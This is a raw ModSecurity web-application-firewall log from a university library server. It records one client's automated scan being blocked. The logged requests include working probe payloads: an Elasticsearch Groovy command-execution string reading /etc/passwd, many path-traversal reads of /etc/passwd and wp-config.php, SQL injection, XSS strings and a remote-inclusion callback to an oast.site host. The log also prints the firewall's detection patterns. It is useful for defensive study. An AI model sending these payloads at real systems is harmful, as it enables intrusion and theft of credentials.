\\x22java.lang.Math.class.forName(\\x5c\\x5c\\x22java.lang.Runtime\\x5c\\x5c\\x22).getRuntime().exec(\\x5c\\x5c\\x22cat /etc/passwd\\x5c\\x5c\\x22).getText()\\x22}}}: {size:1 script_fields: {lupin:{lang:groovy script: java.lang.math.class.forname(java.lang.runtime).getruntime().exec(cat/etc/passwd).gettext()}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [hostname "digilibfkip.unla.ac.id"] [uri "/_search"] [unique_id "ZO14d8Co-f0AAAjtc5AAAAAX"]
[Tue Aug 29 11:47:52.464187 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14eMCo-f0AAAkdu4UAAAAO"]
[Tue Aug 29 11:47:52.588736 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14eMCo-f0AAAkGCUMAAAAE"]
[Tue Aug 29 11:47:53.454489 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14ecCo-f0AAAkdu4sAAAAO"]
[Tue Aug 29 11:47:56.443684 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:guideState. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:guideState: {\\x22guideState\\x22:{\\x22guideDom\\x22:{},\\x22guideContext\\x22:{\\x22xsdRef\\x22:\\x22\\x22,\\x22guidePrefillXml\\x22:\\x22<afData>\\x5cu0041\\x5cu0042\\x5cu0043</afData>\\x22}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/content/2UdyWQdY5J32lAmsUBxLSfyO3WC.af.internalsubmit.json"] [unique_id "ZO14fMCo-f0AAAjbw4EAAAAW"]
[Tue Aug 29 11:47:57.435300 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:adaptive-images-settings[source_file]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:adaptive-images-settings[source_file]: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/adaptive-images/adaptive-images-script.php"] [unique_id "ZO14fcCo-f0AAAjy52EAAAAG"]
[Tue Aug 29 11:47:58.407772 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../ found within ARGS:query: php://filter/resource=../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/jsmol2wp/php/jsmol.php"] [unique_id "ZO14fsCo-f0AAAjbw4gAAAAW"]
[Tue Aug 29 11:47:58.464165 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dw_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../.././../../../ found within ARGS:dw_file: ../../.././../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php/component/jemessenger/box_details"] [unique_id "ZO14fsCo-f0AAAjbw4oAAAAW"]
[Tue Aug 29 11:47:59.353476 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:filepath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "ZO14f8Co-f0AAAkdu6AAAAAO"]
[Tue Aug 29 11:48:02.475127 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file_path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "ZO14gsCo-f0AAAkGCVwAAAAE"]
[Tue Aug 29 11:48:03.369618 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14g8Co-f0AAAjbw6AAAAAW"]
[Tue Aug 29 11:48:04.419050 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO14hMCo-f0AAAkNPsYAAAAI"]
[Tue Aug 29 11:48:05.403070 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: now( found within ARGS:id: -1 unmasterion semasterlect top 1 UserID,GroupID,LoginName,Password,now(),null,1  frmasterom {prefix}user"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/plug/comment/commentList.asp"] [unique_id "ZO14hcCo-f0AAAkksG0AAAAA"]
[Tue Aug 29 11:48:05.428646 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfkip.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO14hcCo-f0AAAjy55YAAAAG"]
[Tue Aug 29 11:48:06.402747 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:key: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/church-admin/display/download.php"] [unique_id "ZO14hsCo-f0AAAjy55oAAAAG"]
[Tue Aug 29 11:48:06.410142 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14hsCo-f0AAAkksHMAAAAA"]
[Tue Aug 29 11:48:07.743746 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO14h8Co-f0AAAjYrCgAAAAK"]
[Tue Aug 29 11:48:08.395265 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/download.action"] [unique_id "ZO14iMCo-f0AAAkksHoAAAAA"]
[Tue Aug 29 11:48:09.426136 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:sub_page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:sub_page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/tutor/views/pages/instructors.php"] [unique_id "ZO14icCo-f0AAAkGCXIAAAAE"]
[Tue Aug 29 11:48:09.479734 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14icCo-f0AAAjbw8IAAAAW"]
[Tue Aug 29 11:48:11.415447 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/sysaid/getGfiUpgradeFile"] [unique_id "ZO14i8Co-f0AAAkksIoAAAAA"]
[Tue Aug 29 11:48:12.359472 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfkip.unla.ac.id"] [uri "/wls-wsat/RegistrationRequesterPortType"] [unique_id "ZO14jMCo-f0AAAjbw9AAAAAW"]
[Tue Aug 29 11:48:12.485506 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/getGfiUpgradeFile"] [unique_id "ZO14jMCo-f0AAAkksJwAAAAA"]
[Tue Aug 29 11:48:12.737547 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "digilibfkip.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jMCo-f0AAAkoTgsAAAAH"]
[Tue Aug 29 11:48:12.737590 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "digilibfkip.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jMCo-f0AAAkoTgsAAAAH"]
[Tue Aug 29 11:48:17.785699 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:loginParams. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x22,\\x22 found within ARGS:loginParams: {\\x22username\\x22:\\x22cmuser\\x22,\\x22password\\x22:\\x22\\x22,\\x22authType\\x22:0}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/fpui/loginServlet"] [unique_id "ZO14kcCo-f0AAAkdu9oAAAAO"]
[Tue Aug 29 11:48:18.432450 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14ksCo-f0AAAkoTigAAAAH"]
[Tue Aug 29 11:48:21.371591 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:message_success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:message_success: <img src=c onerror=alert(8675309)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lcCo-f0AAAkrz6MAAAAC"]
[Tue Aug 29 11:48:21.406086 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:calendar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:calendar: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/themes/diarise/download.php"] [unique_id "ZO14lcCo-f0AAAjM7K0AAAAT"]
[Tue Aug 29 11:48:21.659901 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:key: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/custom-tables/iframe.php"] [unique_id "ZO14lcCo-f0AAAjYrEoAAAAK"]
[Tue Aug 29 11:48:22.412166 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:message_error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:message_error: <img src=c onerror=alert(8675309)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lsCo-f0AAAjYrFAAAAAK"]
[Tue Aug 29 11:48:23.474997 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:loginname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:loginname: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/login/forgetpswd.php"] [unique_id "ZO14l8Co-f0AAAj12EYAAAAa"]
[Tue Aug 29 11:48:23.807536 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g5o6uxg66cyxnn.oast.site/file.txt found within TX:1: cjmnbitjmimt14dgn26g5o6uxg66cyxnn.oast.site/file.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO14l8Co-f0AAAj12E8AAAAa"]
[Tue Aug 29 11:48:27.864785 2023] [:error] [pid 2361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./ found within ARGS:f1: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14m8Co-f0AAAk5Ce4AAAAg"]
[Tue Aug 29 11:48:31.527968 2023] [:error] [pid 2348] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:graph: usedMemory</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/monitoring"] [unique_id "ZO14n8Co-f0AAAkskr4AAAAN"]
[Tue Aug 29 11:48:32.360278 2023] [:error] [pid 2377] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:data[User][username]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:data[User][username]: data[User][username]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/users/login"] [unique_id "ZO14oMCo-f0AAAlJmaQAAAAo"]
